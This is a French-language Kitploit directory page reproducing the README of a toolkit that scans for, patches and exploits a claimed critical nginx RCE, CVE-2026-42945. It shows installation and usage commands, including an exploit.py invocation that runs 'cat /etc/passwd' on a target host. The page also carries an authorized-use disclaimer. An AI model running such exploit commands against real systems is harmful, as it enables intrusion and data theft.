Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-42945-NGINX-Rift-Toolkit — Boîte à outils automatisée pour scanner, exploiter et corriger CVE-2026-42945 (RCE critique dans nginx). Comprend un scanner réseau, un exploit par heap spray et un correcteur par lots avec rapports HTML/JSON. | Kitploit
Outils/GitHubGitHub/gagaltotal/cve-2026-42945-nginx-rift-toolkit
Scanners de VulnérabilitésCartographie RéseauExploitationAudit de ConfigurationSécurité WebTests d'Intrusion
GitHubgagaltotal/cve-2026-42945-nginx-rift-toolkit

CVE-2026-42945-NGINX-Rift-Toolkit

Boîte à outils automatisée pour scanner, exploiter et corriger CVE-2026-42945 (RCE critique dans nginx). Comprend un scanner réseau, un exploit par heap spray et un correcteur par lots avec rapports HTML/JSON.

Voir le dépôtSite web
415il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-42945 Nginx Rift Vulnerability Toolkit

CVSS Score: 9.8 - Critical Python Version License

Kit d'outils complet pour scanner, corriger et tester CVE-2026-42945 - une vulnérabilité critique d'exécution de code à distance (RCE) dans nginx

Table of Contents

  • Overview
  • CVE Details
  • Features
  • Toolkit Components
  • Requirements
  • Installation
  • Usage
  • Workflow Examples
  • Security Considerations
  • Troubleshooting
  • Contributing

Aperçu

Ce kit fournit des outils complets pour scanner, corriger et tester CVE-2026-42945, une vulnérabilité critique d'exécution de code à distance dans nginx affectant les versions antérieures à 1.26.3 (mainline) et 1.24.1 (stable).

La vulnérabilité exploite l'analyse d'en-têtes HTTP/2 malformés lorsque l'ASLR est désactivé à l'aide de techniques de heap spray.

Détails de la CVE

PropriétéValeur
Identifiant de la vulnérabilitéCVE-2026-42945
TypeExécution de code à distance (RCE)
Score CVSS9.8 (Critique)
Versions affectées< 1.26.3 (mainline) / < 1.24.1 (stable)
Version corrigée1.26.3+
Vecteur d'attaqueAnalyse d'en-têtes HTTP/2 malformés
Condition préalableASLR désactivé sur le système cible

Fonctionnalités

  • Scan réseau - Scan de sous-réseaux CIDR avec découverte simultanée d'hôtes
  • Détection de version - Identification de la version de nginx multi-distributions via SSH
  • Correction automatisée - Correction par lots des instances vulnérables sur les réseaux
  • Test d'exploitation - Vérifier la vulnérabilité avec des techniques de heap spray
  • Génération de rapports - Rapports aux formats HTML et JSON
  • Mode Dry-Run - Aperçu des modifications avant application
  • Multi-authentification - Authentification par clé SSH et par mot de passe
  • Journalisation d'audit - Journaux d'opérations détaillés avec horodatage

Composants du kit

1. nginx_scanner.py - Scanner de vulnérabilités

Scanne un sous-réseau ou un hôte unique pour identifier les installations nginx vulnérables.

Fonctionnalités :

  • Prise en charge du scan de sous-réseaux CIDR
  • Découverte simultanée d'hôtes et détection de version
  • Vérification à distance de la version via SSH
  • Prise en charge multi-distributions (Ubuntu, Debian, CentOS, AlmaLinux, RHEL)
  • Génération de rapports HTML et JSON
  • Ports SSH et méthodes d'authentification personnalisables

2. nginx_patcher.py - Automatisation des correctifs

Corrige automatiquement les instances nginx vulnérables vers la dernière version sécurisée.

Fonctionnalités :

  • Correction par lots sur des plages de sous-réseaux
  • Commandes de correctif spécifiques à la distribution
  • Mode dry-run pour validation de sécurité
  • Spécification de la version cible
  • Journaux d'exécution détaillés des correctifs
  • Suivi de progression et rapports

3. exploit.py - Exploit d'exécution de code à distance

Teste la vulnérabilité CVE-2026-42945 via la technique du heap spray.

Fonctionnalités :

  • Cible les instances nginx avec ASLR désactivé
  • Exploitation de débordement de tampon par heap spray
  • Prise en charge de plusieurs offsets pour la fiabilité
  • Capacité d'exécution de commandes à distance
  • Mécanismes de délai d'attente et de nouvelle tentative de connexion
  • Statistiques d'exécution détaillées

Distributions prises en charge

  • Ubuntu (toutes les versions avec nginx)
  • Debian (toutes les versions avec nginx)
  • CentOS 7+
  • AlmaLinux
  • RHEL (Red Hat Enterprise Linux)

Prérequis

  • Python : 3.7 ou supérieur
  • Système d'exploitation : environnement Linux/Unix

Dépendances

root@kitploit:~
paramiko (>= 3.0.0) - SSH client library
rich (>= 13.0.0) - Terminal formatting and progress bars

Installation

Étape 1 : Cloner ou télécharger

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-42945-NGINX-Rift-Toolkit
cd CVE-2026-42945-NGINX-Rift-Toolkit

Étape 2 : Créer l'environnement virtuel

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate

Étape 3 : Installer les dépendances

root@kitploit:~
pip install -r requirements.txt

Utilisation

Screen Capture

Scanner (nginx_scanner.py)

Scan de sous-réseau de base

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Scan d'un hôte unique

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.10 --user root --key ~/.ssh/id_rsa

Authentification par mot de passe

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/30 --user admin --password "password"

Port SSH personnalisé

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --port 2222 --user root --key ~/.ssh/id_rsa

Générer un rapport HTML

root@kitploit:~
python3 nginx_scanner.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --output report.html

Options du scanner

root@kitploit:~
--subnet SUBNET              Target subnet in CIDR format (required)
--user USER                  SSH username (default: root)
--password PASSWORD          SSH password
--key KEY_PATH              Path to SSH private key
--port PORT                 SSH port (default: 22)
--timeout TIMEOUT           Connection timeout in seconds (default: 5)
--output FILE               Output report file (HTML/JSON)
--workers WORKERS           Number of concurrent threads (default: 20)

Patcher (nginx_patcher.py)

Screen Capture

Correction de base

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Dry-Run (Aperçu sans application)

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run

Version cible spécifique

root@kitploit:~
python3 nginx_patcher.py --subnet 192.168.1.0/24 --target-version 1.26.3 --user root --key ~/.ssh/id_rsa

Port SSH personnalisé

root@kitploit:~
python3 nginx_patcher.py --subnet 10.0.0.0/30 --port 2222 --user admin --password "password"

Options du patcher

root@kitploit:~
--subnet SUBNET              Target subnet in CIDR format (required)
--user USER                  SSH username (default: root)
--password PASSWORD          SSH password
--key KEY_PATH              Path to SSH private key
--port PORT                 SSH port (default: 22)
--timeout TIMEOUT           Connection timeout in seconds (default: 30)
--target-version VERSION    Nginx version to patch to (default: latest)
--dry-run                   Show what would be patched without executing
--workers WORKERS           Number of concurrent threads (default: 10)

Exploit (exploit.py)

Screen Capture

Exploiter une cible unique

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80

Avec une charge utile personnalisée

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --command "cat /etc/passwd"

Plusieurs tentatives de spray

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --spray 50

Sortie détaillée

root@kitploit:~
python3 exploit.py --target 192.168.1.100 --port 80 --verbose

Options de l'exploit

root@kitploit:~
--target HOST               Target host IP or domain (required)
--port PORT                 Target port (default: 80)
--command CMD               Command to execute
--spray NUM                 Number of heap spray attempts (default: 20)
--timeout TIMEOUT           Connection timeout in seconds (default: 5)
--tries NUM                 Number of exploitation attempts (default: 10)
--verbose                   Enable verbose output

Exemples de flux de travail

Scénario 1 : Évaluation de sécurité complète

root@kitploit:~
# Étape 1 : Scanner le réseau pour les instances vulnérables
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key --output scan_results.html

# Étape 2 : Examiner les résultats du scan dans scan_results.html

# Étape 3 : Corriger les instances vulnérables
python3 nginx_patcher.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key

# Étape 4 : Vérifier que les correctifs sont appliqués en relançant le scanner
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user admin --key ~/.ssh/key

Scénario 2 : Correction d'urgence

root@kitploit:~
# Étape 1 : Dry-run pour voir ce qui serait corrigé
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa --dry-run

# Étape 2 : Appliquer les correctifs
python3 nginx_patcher.py --subnet 192.168.1.0/24 --user root --key ~/.ssh/id_rsa

Scénario 3 : Test sur un système vulnérable

root@kitploit:~
# Étape 1 : Vérifier d'abord que le système est vulnérable
python3 exploit.py --target 10.0.0.50 --port 80 --verbose

# Étape 2 : En cas de succès, une correction immédiate est recommandée
python3 nginx_patcher.py --subnet 10.0.0.50 --user root --key ~/.ssh/id_rsa

Considérations de sécurité

ConsidérationDétails
Gestion des clés SSHStockez les clés SSH de manière sécurisée, ne les commitez jamais dans des dépôts
Accès réseauAssurez une segmentation réseau appropriée pour une utilisation en production
Environnement de testTestez toujours d'abord dans un environnement hors production
JournalisationToutes les opérations génèrent des journaux détaillés pour la traçabilité
Statut ASLRL'outil d'exploitation exige que l'ASLR soit désactivé sur la cible
Mode Dry-runUtilisez l'option --dry-run pour prévisualiser les modifications avant application
SauvegardeSauvegardez toujours la configuration nginx avant de corriger

Méthodes d'authentification

Basée sur clé SSH (recommandée)

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --key ~/.ssh/id_rsa

Basée sur mot de passe

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --password "password"

Port SSH personnalisé

root@kitploit:~
python3 nginx_scanner.py --subnet 10.0.0.0/24 --user root --key ~/.ssh/id_rsa --port 2222

Dépannage

Problèmes de connexion SSH

  • Permissions de la clé SSH : chmod 600 ~/.ssh/id_rsa
  • Service SSH : Vérifiez que le service SSH est actif sur la cible
  • Port SSH : Vérifiez que le port SSH est correct (défaut : 22)
  • Pare-feu : Assurez-vous que le pare-feu autorise les connexions SSH

Échec de la détection de version

  • Nginx installé : Confirmez que nginx est installé sur la cible
  • Privilèges : Vérifiez que l'utilisateur dispose des privilèges sudo ou d'un accès root direct
  • Réseau : Vérifiez la connectivité réseau vers les hôtes cibles

Échecs de correction

  • Test dry-run : Utilisez --dry-run pour identifier les problèmes sans appliquer
  • Internet : Assurez-vous que les systèmes cibles ont une connectivité Internet pour télécharger les paquets
  • Gestionnaire de paquets : Vérifiez que le gestionnaire de paquets fonctionne sur les cibles
  • Espace disque : Vérifiez l'espace disque sur les systèmes cibles

Rapports de sortie

Le scanner génère des rapports détaillés dans plusieurs formats :

FormatDescription
Rapport HTMLConsultable dans un navigateur avec résumé de la vulnérabilité, hôtes affectés, détails de version
Rapport JSONFormat lisible par machine avec tous les détails techniques
Sortie consoleProgression en temps réel avec résultats codés par couleur

Journalisation

Toutes les opérations sont journalisées avec horodatage pour la conformité d'audit. Consultez la sortie console pour des informations d'exécution détaillées.

Contribution

Les contributions sont les bienvenues ! Pour contribuer :

  1. Forkez le dépôt
  2. Créez une branche de fonctionnalité (git checkout -b feature/improvement)
  3. Commitez vos modifications (git commit -am 'Add improvement')
  4. Poussez vers la branche (git push origin feature/improvement)
  5. Ouvrez une Pull Request

Avertissement

Ce kit est fourni uniquement pour les tests de sécurité autorisés et l'évaluation de vulnérabilités. L'accès non autorisé à des systèmes informatiques est illégal. Les utilisateurs sont responsables de s'assurer qu'ils disposent d'une autorisation appropriée avant d'utiliser ce kit.

Auteur

gagaltotal - GitHub

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.


Dernière mise à jour : 2026-05-20

Télécharger l’outil